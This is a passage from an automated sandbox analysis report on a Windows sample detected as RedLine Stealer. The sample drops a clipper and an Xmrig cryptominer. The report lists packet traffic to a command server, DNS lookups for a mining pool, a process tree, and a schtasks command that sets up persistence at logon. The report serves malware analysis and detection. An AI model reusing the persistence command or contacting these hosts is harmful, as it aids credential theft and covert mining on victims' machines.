                                                                                                                                  Jan 14, 2022 14:10:44.055257082 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055259943 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055278063 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055301905 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055334091 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055356026 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055377960 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055399895 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055419922 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055435896 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055453062 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055469036 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055470943 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055485010 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055500984 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055521011 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055541992 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055563927 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055578947 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055596113 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055618048 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055638075 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055654049 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055674076 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055675983 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055695057 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055715084 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055716038 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055722952 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055727959 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055738926 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055757046 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055762053 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055763006 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055780888 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055795908 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055800915 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055833101 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055850029 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055866957 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055885077 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055893898 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055919886 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055953026 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.055953979 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.055980921 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056005955 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056011915 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.056032896 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056050062 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.056060076 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056085110 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056107044 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.056109905 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056137085 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056159973 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.056163073 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056190014 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.056220055 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.081578970 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081641912 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081665993 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.081680059 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081720114 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081736088 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.081763983 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081801891 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081805944 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.081841946 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081906080 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.081908941 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081950903 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.081986904 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.081990004 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082031965 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082067966 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082096100 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.082108021 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082148075 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082173109 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.082186937 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082225084 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.082226992 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082267046 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082324982 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082325935 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.082365990 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082403898 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082452059 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.082464933 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082515001 CET497797777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:44.082519054 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082562923 CET77774977945.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:44.082607985 CET497797777192.168.2.445.82.70.152

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Jan 14, 2022 14:11:24.046226978 CET192.168.2.48.8.8.80x6868Standard query (0)mine.bmpool.orgA (IP address)IN (0x0001)
                                                                                                                                  Jan 14, 2022 14:11:35.964977026 CET192.168.2.48.8.8.80x728aStandard query (0)mine.bmpool.orgA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Jan 14, 2022 14:11:24.071038961 CET8.8.8.8192.168.2.40x6868No error (0)mine.bmpool.org157.90.156.89A (IP address)IN (0x0001)
                                                                                                                                  Jan 14, 2022 14:11:35.987705946 CET8.8.8.8192.168.2.40x728aNo error (0)mine.bmpool.org157.90.156.89A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • 45.82.70.152:7777

                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  Analysis Process: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe PID: 6220 Parent PID: 5336

                                                                                                                                  General

                                                                                                                                  Start time:14:10:10
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:3609088 bytes
                                                                                                                                  MD5 hash:C7F9EFB09DB59923B3F96FD1EF2F0873
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: AppLaunch.exe PID: 5180 Parent PID: 6220

                                                                                                                                  General

                                                                                                                                  Start time:14:10:12
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Imagebase:0x1040000
                                                                                                                                  File size:98912 bytes
                                                                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: sistem.exe PID: 5576 Parent PID: 5180

                                                                                                                                  General

                                                                                                                                  Start time:14:10:42
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\sistem.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\sistem.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:3514792 bytes
                                                                                                                                  MD5 hash:14A6FC2FF495BE7077B8AA7602606BB7
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 31%, Metadefender, Browse
                                                                                                                                  • Detection: 75%, ReversingLabs
                                                                                                                                  Reputation:low

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: AppLaunch.exe PID: 7016 Parent PID: 5576

                                                                                                                                  General

                                                                                                                                  Start time:14:10:44
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Imagebase:0x1040000
                                                                                                                                  File size:98912 bytes
                                                                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: Microsoft.exe PID: 7116 Parent PID: 5180

                                                                                                                                  General

                                                                                                                                  Start time:14:10:44
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 53%, Virustotal, Browse
                                                                                                                                  Reputation:low

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 2188 Parent PID: 7116

                                                                                                                                  General

                                                                                                                                  Start time:14:10:47
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: cmd.exe PID: 6036 Parent PID: 2188

                                                                                                                                  General

                                                                                                                                  Start time:14:10:50
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 1584 Parent PID: 6036

                                                                                                                                  General

                                                                                                                                  Start time:14:10:51
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: schtasks.exe PID: 6380 Parent PID: 6036

                                                                                                                                  General

                                                                                                                                  Start time:14:10:51
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                  Imagebase:0x7ff6d4de0000
                                                                                                                                  File size:226816 bytes
                                                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: services64.exe PID: 6688 Parent PID: 968

                                                                                                                                  General

                                                                                                                                  Start time:14:10:53
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 53%, Virustotal, Browse
                                                                                                                                  Reputation:low

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: cmd.exe PID: 6696 Parent PID: 2188

                                                                                                                                  General

                                                                                                                                  Start time:14:10:53
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 6012 Parent PID: 6688

                                                                                                                                  General

                                                                                                                                  Start time:14:10:54
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.821033223.0000020180001000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 3160 Parent PID: 6696

                                                                                                                                  General

                                                                                                                                  Start time:14:10:54
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: services64.exe PID: 864 Parent PID: 6696

                                                                                                                                  General

                                                                                                                                  Start time:14:10:55
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 6840 Parent PID: 864

                                                                                                                                  General

                                                                                                                                  Start time:14:10:56
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: sihost64.exe PID: 6288 Parent PID: 6012

                                                                                                                                  General

                                                                                                                                  Start time:14:10:58
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:31232 bytes
                                                                                                                                  MD5 hash:A5D983222C60F4DCAE743F8E34806580
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 6040 Parent PID: 6288

                                                                                                                                  General

                                                                                                                                  Start time:14:10:58
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "/sihost64
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: cmd.exe PID: 4608 Parent PID: 6840

                                                                                                                                  General

                                                                                                                                  Start time:14:10:59
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" cmd /c taskkill /f /PID "6040
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: conhost.exe PID: 6920 Parent PID: 4608

                                                                                                                                  General

                                                                                                                                  Start time:14:11:00
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
